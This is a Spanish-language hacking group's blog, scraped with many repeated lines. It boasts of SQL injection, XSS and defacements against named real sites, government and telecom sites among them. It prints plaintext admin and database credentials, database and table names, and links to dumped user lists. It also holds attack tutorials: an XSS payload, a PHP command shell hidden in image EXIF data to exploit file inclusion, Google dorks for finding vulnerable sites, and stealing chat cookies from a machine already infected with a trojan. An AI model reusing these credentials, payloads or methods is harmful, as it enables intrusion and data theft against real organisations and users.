Siguiendo con los xss.. aqui una a la empresa "Especialista" en Seg. Informatica en Guatemala...!
DevelSecurity Pff...!
DevelSecurity Pff...!
Greetz : [ B4nz0k - Rs4 - W4rn1ng - FailRoot - Almaly]
.:: CMS GUATEMALTECO VULNERABLE ::.Si asi esta el proveedor.. imagenense sus clientes
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.nebsgt.com
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.nebsgt.com
######################
*Author:
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
contenido.php?id='
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
contenido.php?id='
######################
*Dork
allinurl:.gt/contenido.php?id=
intext:Powered by NeBSGT
Comprobe en 5 webs y todas son vuln.. Saludos
### Datos Generales ###
Autor: xDarkSton3x
Bug :Xss
Bug :Xss
Greetz: [ Banz0k - Rs4 - FailRoot - w4rn1ng - Trouk ]
### Datos Generales ###
Path Vulnerable : http://www.mundoxat.com/testearfondos/
Autor: xDarkSton3x
Bug :Xss
Bug :Xss
Greetz : [Banz0k - Rs4 - FailRoot - W4rn1ng - Trouk]
### Datos Generales ###
BD: vamosrirmais_db
User:lq_sorriso_di - Pass:45trid788
Autor: xDarkSton3x
Bug : Sqli
Bug : Sqli
Greetz : [ Banz0k - Rs4 - FailRoot - Trouk - W4rn1ng - Almaly ]
### Datos Generales ###
Site: http://www.terra.com.pe
Path Vulnerable: http://www.terra.com.pe/php/galeria/sociales/galeria.php?galeria=
Path Vulnerable: http://www.terra.com.pe/php/galeria/sociales/galeria.php?galeria=
Autor: xDarkSton3x
Bug : Xss
Bug : Xss
Bien Buscando mas Xss por los dominios de terra me encontre con otros...!
Dr.White :
Pues puse " en ves de arroba por que se me cambio el idioma de la pc y se escribio en medio de la pagina y dije WTF y en eso dije a ver comenze a provar hice que salte un marquee pero no podia hacer nada mas le pase el bug a xDarkSton3x me ayudo con la Expl0tacion y pudimos hacer que salte el Alert :).
Inyeccion:
//">'><SCRIPT>alert('SeguridadBlanca And xDarkSton3x')</SCRIPT>
Pues puse " en ves de arroba por que se me cambio el idioma de la pc y se escribio en medio de la pagina y dije WTF y en eso dije a ver comenze a provar hice que salte un marquee pero no podia hacer nada mas le pase el bug a xDarkSton3x me ayudo con la Expl0tacion y pudimos hacer que salte el Alert :).
Inyeccion:
//">'><SCRIPT>alert('SeguridadBlanca And xDarkSton3x')</SCRIPT>
Saludos con Todos
Las maneras de utilizar la inclusión de archivos locales son numerosas y cada vez más imaginativas...Obviamente de quien lo realiza xD , como en el caso de la "Inyeccion de imagen". Hoy vamos a ver qué significa, qué es y cómo se puede explotar.
Digamos que usted encuentra un sitio vulnerable a LFI, vamos a decir que este sitio también tiene una página que nos permite subir imágenes, como por ejemplo una comunidad. Bien ahora
¿Cómo usar un avatar para explotar el LFI?
Sabemos que una imagen, al igual que todos los archivos, contiene datos distintos de los que se constituyen en sí, hay otros que retienen información sobre el tipo de cámara utilizada, la fecha y la hora en que fue tomada la foto, comentarios, etc...Estos son llamados “Exif”
Exif: Exif es una abreviación de “Exchangeable Image File Format”. En pocas palabras, es una estandarización de la información sobre el formato de la imagen. [ Según Google ]
Pero precisamente este tipo de información es la que modificaremos para agregar un pequeño script PHP dentro de la imagen. Para ello utilizaremos el programa Jhead , con el que podemos ver y editar los datos EXIF de cualquier imagen se nos venga en gana xD..
Aquí Tenemos las propiedad de una IMAGEN sin la modificación
Bien Ahora... lo que haremos sera Agregar un codigo PHP que nos permita Ejecutar ciertos comandos.
<Php $ s = $ _GET; @ chdir ($ s ['d']) echo sistema @ ($ s ['y'])?>
Nuestro Pequeño Script Quedara grabado dentro de los dato EXIF
Bien Ahora lo que haremos es cargar nuestra imagen en el sitio e incluirlo en la página vulnerable a las variables de secuencia de comandos de la definición de LFI, en este caso d y e del directorio para el comando a ejecutar. Cabe destacar que tambien podemos usar esto para byppasear algun Upload , solo es cuestion de jugar un poco con todo esto.. Saludos
http://localhost/metalsoft.php?test=/directorio/Imagen1.jpg & d = / = y & ls
Eso fue todo, espero entiendan mas que sea un poco de lo que explique xD..! Saludos.
xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Autor: xDarkSton3x
Bug : Xss
Bug : Xss
Greetz: Metalsoft #Team | Dedalo
### Datos Generales ###
Site: http://www.miclaro.com.ec
Path Vulnerable: http://www.miclaro.com.ec/
Data Base : claro_web
Tabla : ac_usuario
Panel: http://www.miclaro.com.ec/web/DayAdmin/
Path Vulnerable: http://www.miclaro.com.ec/
Data Base : claro_web
Tabla : ac_usuario
Panel: http://www.miclaro.com.ec/web/DayAdmin/
Lista de Usuarios | Permisos de Administrador
[No Probe Todos]
http://pastebin.com/zYqN8BQX
Besitos a las nenas de Claro Ecuador .... Para que vean que aun Tengo Acceso
PD: No sean lammers y me dan creditos si lo copian
Greetz: {MetalSoft #Team}
### Datos Generales ###
Site: http://club.movistar.com.ve/web/
Path Vulnerable: http://club.movistar.com.ve//
Data Base : cm01
Tabla : cm_client_movistar
Total de Clientes Movitar - Venezuela : 4516484
Colaborador: Trouk
Path Vulnerable: http://club.movistar.com.ve//
Data Base : cm01
Tabla : cm_client_movistar
Total de Clientes Movitar - Venezuela : 4516484
Colaborador: Trouk
Lista de Usuarios
http://pastebin.com/4aewbGmm
Greetz: {MetalSoft #Team}
Greetz: {MetalSoft #Team}
Creo que el 80% Seguimos esta Rutina de vez en cuando xD
xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Path Vuln : http://www.guatemala.gob.gt/
Path Vuln 2 : http://www.guatemala.gob.gt/
Bug: Xss
Autor : xDarkSton3x
Greetz : [All Members MetalSoft #Team ]
All Friends
Bueno todo comenzo el 28 de este mes cuanto comenzaron a spamearme y a insultarme via correo por haber publicado unas vulnerabilidades del sitio web de dicha universidad. Resulta que primero le hice un reverse DNS para revisar cuantas websites estaban compartiendo el server, lo cual me dio como resultado 15 subdominios. ala cual le atine a coger una de ellas y comenzar .
Aqui un poco de informacion :
### Datos Generales ###
Bug: Full Path Disclosure - Sqli
Autor : xDarkSton3x
Culminada la injeccion , ingrese al panel administrativo en busca de un upload para subir mi shell y asi poder de alguna forma ROOTEAR , o en caso contrario apoderarme de las BD [que fue lo que hize]. con los datos del config de la BD los cuales no colocares aqui xq de seguro muchos Kiddies comenzaran a joder. Comenzando a revisar cuantas BD tenia...
Lo que pude obtener pueden vizualizarlos en los links que colocare, es un estracto de algunas BD
Lo que pude obtener pueden vizualizarlos en los links que colocare, es un estracto de algunas BD
http://pastebin.com/LaxYvb00
http://pastebin.com/yiddrzkQ
http://pastebin.com/C7Xi39uz
http://pastebin.com/UpQQjqDj
http://pastebin.com/4sWjaDqL
http://pastebin.com/7EBMLVJ2
Recuerder que el sol no se tapa con un dedo =)
Saludos Atte: xDarkSton3x | MetalSoft #Team
http://pastebin.com/yiddrzkQ
http://pastebin.com/C7Xi39uz
http://pastebin.com/UpQQjqDj
http://pastebin.com/4sWjaDqL
http://pastebin.com/7EBMLVJ2
Recuerder que el sol no se tapa con un dedo =)
Saludos Atte: xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Path Vuln : http://yosikids.emisorasunidas.com
Bug: Xss
Autor : xDarkSton3x
Greetz : [All Members MetalSoft #Team ]
All Friends
MetalSoft #Team
### Datos Generales ###
Path Vuln : http://bankofmaligno.informatica64.com/
Bug: Xss
Greetz : [All Members MetalSoft #Team ]
All Friends
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Path : http://www.movistar.com.gt/
DB :movistargt
Status:Hacked - Vulnerable
Quien Dijo Que No ¿?
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
DB :seprem09_
Tabla: cms_users
Status:Hacked
PD: El CMS es Vulnerable xD..!
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
DB : presidencia2
Tabla: usuario
Status: Vulnerable = Hacked
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Bugs : Sqli
Panel : http://www.directorio.com.gt/
Status: Vulnerable = Hacked
usuarios: Click Aqui
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Bugs : Sqli -Xss
Path : http://www.tse.org.gt
DB: web_users
Columna: admin_users
Status: Vulnerable = Hacked
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Bug : Sqli - Full Path Disclosure
DB: gana_ganaDB
Columna: admin_users
Status: Vulnerable
Lista de usuarios : http://system.eshost.es/gana.txt
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Bug : Sqli
Status: Owned
Hacked xDarkSton3x | MetalSoft #Team
### Datos Generales ###
Bug : Sqli
Status: Owned
PD: No Somos parte de Anonymous =)
### Datos Generales ###
Bug : Sqli
Panel: http://canal3.fideck.com/
Status: Owned
Bug en la web del Banco Central de Bolivia [BCB]
### Datos Generales ###
Vuln Xss: http://www.bcb.gob.bo/
Vuln Sqli : http://www.bcb.gob.bo/
Web Server: Apache
DB : webdeuda
Autor : xDarkSton3x | MetalSoft #Team
PD: El bug sera reportado, a su respectivo Administrador...! Saludos =)
Zundi Cms Hacked
Bug : Sqli
http://www.fpstudio.com.bo/
http://2011.boliviagasenergia.com/
http://2008.boliviagasenergia.com/
http://pncc.cbh.org.bo/documentos/index.txt
http://www.new.cbh.org.bo/banners/metalsoft.php
PD: Estas son todas las webs que el Proveedor ha diseñado
Bueno el dia de ayer se hicieron los defaceds a 5 webs de Ecuador, los motivos fueron muchos...! en fin ai les dejo la imagen de "rts.com.ec" que fue la unica a la que le tomaron foto xD.. y los links de las webs q se defacearon
RTS - TELEVISION
DB RTS
Descarga : Click Aqui
Lista de Webs Defaceadas
http://www.puntonet.ec/
http://www.rts.com.ec/
http://www.galaxia.com.ec/
http://www.jcradio.com.ec/
http://www.radiolared.com.ec/
http://www.rts.com.ec/
http://www.galaxia.com.ec/
http://www.jcradio.com.ec/
http://www.radiolared.com.ec/
MetalSoft #Team
.:: CMS COLOMBIANO VULNERABLE ::.
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.iraka.co
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.iraka.co
######################
*Author:
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
informacion.php?id='
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
informacion.php?id='
categoria.php?id='
######################
Panel: /admin
#####################
#####################
User: admin
Pass:akari
PD: Pueden ver las webs creadas desde su protafolio
Lista de webs Defaceadas
http://www.hospitalanza.gov.co/compartidos/docs/index.html
http://www.fundacionparaelbienestarglobal.com/compartidos/docs/index.html
http://dislonltda.com/compartidos/docs/index.html
http://fundacionparaelbuengobierno.org/compartidos/docs/index.html
http://busesyrutas.com/compartidos/docs/index.html
http://brahmanabastecedora.com/compartidos/docs/index.html
http://www.sociedadcolombianadegeologia.org/compartidos/docs/index.html
http://www.fundacionparaelbienestarglobal.com/compartidos/docs/index.html
http://dislonltda.com/compartidos/docs/index.html
http://fundacionparaelbuengobierno.org/compartidos/docs/index.html
http://busesyrutas.com/compartidos/docs/index.html
http://brahmanabastecedora.com/compartidos/docs/index.html
http://www.sociedadcolombianadegeologia.org/compartidos/docs/index.html
http://pabloedgar.com/compartidos/docs/index.html
MetalSoft #Team
Lista de webs defaceadas el dia 11/08/2011 - Ecuador
www.martel.com.ec/downloads/index.html
www.arizagalaw.com/index.html
www.smartpro.com.ec/index.html
www.solunajoyas.com/index.html
www.olacchi.org/images/index.html
www.marsuarte.com/images/index.html
www.arizagalaw.com/index.html
http://www.visitecuador.travel/images/index_.php
http://www.sombrerosecuador.com/images/index.html
http://www.impladuanas.com/images/banners/index.html
http://www.selvavidasinfronteras.org/images/index.html
http://www.alapecuador2012.org/images/index.html
http://www.artenobjetos.com/imag/index.html
http://www.artesanosecuador.com/images/index.html
http://www.aspergerecuador.com/imagenes/index.html
http://www.bigallihats.com/pedidos/index.html
http://www.camecol.com/images/index.html
http://www.ceda.org.ec/images/index.html
http://www.cotopaxiecuador.com/images/index.html
http://www.creativeworks.com.ec/index.html
http://www.expoflores.com/images/index.html
http://www.fiscellaflowers.com/
http://www.elpigualecuador.com/images/home/index.html
http://www.ecucanchamber.org/images/index.html
http://www.domizil.ec/metalsoft.html
www.arizagalaw.com/index.html
www.smartpro.com.ec/index.html
www.solunajoyas.com/index.html
www.olacchi.org/images/index.html
www.marsuarte.com/images/index.html
www.arizagalaw.com/index.html
http://www.visitecuador.travel/images/index_.php
http://www.sombrerosecuador.com/images/index.html
http://www.impladuanas.com/images/banners/index.html
http://www.selvavidasinfronteras.org/images/index.html
http://www.alapecuador2012.org/images/index.html
http://www.artenobjetos.com/imag/index.html
http://www.artesanosecuador.com/images/index.html
http://www.aspergerecuador.com/imagenes/index.html
http://www.bigallihats.com/pedidos/index.html
http://www.camecol.com/images/index.html
http://www.ceda.org.ec/images/index.html
http://www.cotopaxiecuador.com/images/index.html
http://www.creativeworks.com.ec/index.html
http://www.expoflores.com/images/index.html
http://www.fiscellaflowers.com/
http://www.elpigualecuador.com/images/home/index.html
http://www.ecucanchamber.org/images/index.html
http://www.domizil.ec/metalsoft.html
MetalSoft #Team
Bueno aqui publicando el owned que se le hizo a la web... que por cierto hizo mucha noticia xD...! lo mas gracioso es que "Anonymous" se atribuyen el owned pues resulta que fueron segundones y pusieron su index jaja en fin Zone-H da veracidad de que MetalSoft #Team fue quien entro primero a esa website..
Noticias:
Saludos a todos
Bueno no quiero escribir mucho asi que ai les dejo la lista de webs que pude defacear cuando subi la shell y escale hasta eldirectorio "home/www/" son poquitas pero igual...!
Bueno creo que no hay mucho que decir, asi que les dejo un 5% de la lista de usuarios del Campus Virtual de la Udch, la verdad son muchisimos...Por cierto me olvidaba... las claves estan encriptadas en "md5" y por defauld son las mismas que el "nombre o numero" de usuario.. Saludos...!
Bueno este post es para dar a conocer los Ftp's de la Nasa descubiertos por un mienbro del Team Metalsoft ,
estamos hablando de FailRoot,
un aporte muy bueno
estamos hablando de FailRoot,
un aporte muy bueno
PD: Como dijo Fail xD... Tengan Cuidado con lo que hacen xD.. :: CMS BRASILEÑO VULNERABLE ::.
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.vetor.net/
######################
Vuln: SQL Injection
######################
*Oficial Web:
http://www.vetor.net/
######################
*Dork : intext:"Desenvolvido por Vetor Design"
######################
######################
*Author:
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
noticias.php?id='
xDarkSton3x | MetalSoft #Team
######################
*Variable Afectada:
noticias.php?id='
######################
Panel: admin/
#####################
#####################
User: admin - vepor
Pass: piazedo25
PD: El usuario varia es cualquiera de esos dos, el password en todos es la que coloque.
Saludos !
Hacked By MetalSoft #Team
http://www.premiertravel.ie/index.html
http://inspirecandles.com/index.html
http://rightpriceboilers.ie/index.html
http://www.tedkelleherfirstaidandhygiene.ie/index.html
http://www.mousebusters.ie/index.html
http://www.oconnellstone.com/index.html
http://www.permafrost.ie/index.html
http://www.itssltd.com/index.html
http://www.ballinbuilt.ie/index.html
http://www.mymacroom.com/index.html
http://www.flashbakmedia.com/index.html
http://www.corkdrivinglessons.com/index.html
http://www.browneandassociates.ie/index.html
http://www.descollinsmusic.com/index.html
http://www.cohsales.ie/index.html
http://www.viridus.ie/index.html
http://www.redsetterguesthouse.ie/index.html
http://www.caseysofunionhall.ie/index.html
http://www.ballincolligosteopathic.ie/index.html
http://www.kilcolmanrectory.com/index.html
http://www.murson.ie/index.html
http://www.theosteopath.ie/index.html
http://inspirecandles.com/index.html
http://rightpriceboilers.ie/index.html
http://www.tedkelleherfirstaidandhygiene.ie/index.html
http://www.mousebusters.ie/index.html
http://www.oconnellstone.com/index.html
http://www.permafrost.ie/index.html
http://www.itssltd.com/index.html
http://www.ballinbuilt.ie/index.html
http://www.mymacroom.com/index.html
http://www.flashbakmedia.com/index.html
http://www.corkdrivinglessons.com/index.html
http://www.browneandassociates.ie/index.html
http://www.descollinsmusic.com/index.html
http://www.cohsales.ie/index.html
http://www.viridus.ie/index.html
http://www.redsetterguesthouse.ie/index.html
http://www.caseysofunionhall.ie/index.html
http://www.ballincolligosteopathic.ie/index.html
http://www.kilcolmanrectory.com/index.html
http://www.murson.ie/index.html
http://www.theosteopath.ie/index.html
******************* CONEXIÒN A FOROGERENCIAL **********************
Web: http://www.forogeneracional.com.ar/
$hostname_Conexion1 = "localhost";
$database_Conexion1 = "wwwforo_forogeneracional";
$username_Conexion1 = "wwwforo_usergen";
$password_Conexion1 = "3ideaswffg";
$database_Conexion1 = "wwwforo_forogeneracional";
$username_Conexion1 = "wwwforo_usergen";
$password_Conexion1 = "3ideaswffg";
xDarkSton3x | MetalSoftHackersTeam
Este resumen no está disponible. Haz
clic en este enlace para ver la entrada.
# Búsqueda de sitios web vulnerables.
Ahora…Se Preguntaran Que Son y Como Obtener los Dorks .
Bueno los “Dorks” son motores de búsqueda ok… Ahora Como Obtenerlos pues buscalos, o fabricalos tu mismo.¿Como? Bueno Aquí te Explicare unas Cosas, todo dependerá de ti mismo y del empeño y la imaginacion que le pongas para fabricar tus “Dorks”
Inurl: busca páginas que tengan el término en alguna parte del URL , cabe mencionar que podemos combinarlo con algunos operadores
inurl:"seccion.php?id=3"
Esto nos mostraría las paginas que contengan en su url “seccion.php?id=3"
Site: Busca Paginas Que Contengan El Dominio que Nosotros Agreguemos.
site:com.ar , sitoye: gob.ar , site: edu.ar
Esto nos mostrara sitios web de argentina , no creo que sean tan petes y coloquen los tres , solo usamos uno xD…si colocamos “site: gob.ar” nos mostrara webs del gobierno argentino
PD: Ahora Hagamos Una Union de “inurl + site” para crear nuestro primer “Dork”
site:.com.cl inurl:"seccion.php?id=3"
Donde Este Dork nos Lanzara los Siguientes Sitios:
Bueno espero les haya gustado este pequeño tutorial a los que recién empiezan en esto, hechenle ganas que nunca se termina de aprender…
Website : http://danzhou.gov.cn/
Bug: Sqli
Pd: El bug no ha sido reportado xD.. xq no entendemos el Idioma Haha !
Bueno creo que no hay nada mas que agregar asi que leanla esta muy interesante
Fuente: diosdelared.com
Este Tutorial va a pedido de Boombly,la forma que usaremos es el robo de Cookies para saltar las formas "Seguras" que xat bloqueo.
Pd: Cabe Destacar que para esto ya deberiamos haber infectado a la "Victima" o en otro caso usar un poco de Ingenieria Social. Empezemos.
Si Tenemos El Troyano Instalado en la Pc de la persona que queremos obtener sus cookies, nos vamos a dirigir a Equipo - Users - y Seleccionamos Nuestro usuario en este caso el mio es "xDarkSton3x".
Luego nos dirigimos a la carpeta "AppData"
Se nos abrira un directorio con 3 Carpetas , a la cual le daremos click en "Roaming"
Bueno Seguimos Clickeando y Damos en "Macromedia"
Se nos abrira un directorio con cuatro carpetas y clickeamos en "Flash Player" y elegimos la carpeta "#SharedObjects"
y Elegimos la carpeta de "Xatech" dentro de esa carpeta encontraremos un archivo llamado "chat.sol".
Bueno Copiamos ese archivo y lo sustituimos por el nuestro que se encuentra en el mismo directorio de nuestra pc y worales...tenemos los powers y days de la persona a la que le hemos robado las cokies.
Pd: Disculpen tantas imagenes, boombly es un poco idiota y necesita una explicacion asi xD...
METALSOFT HACKERS TEAM
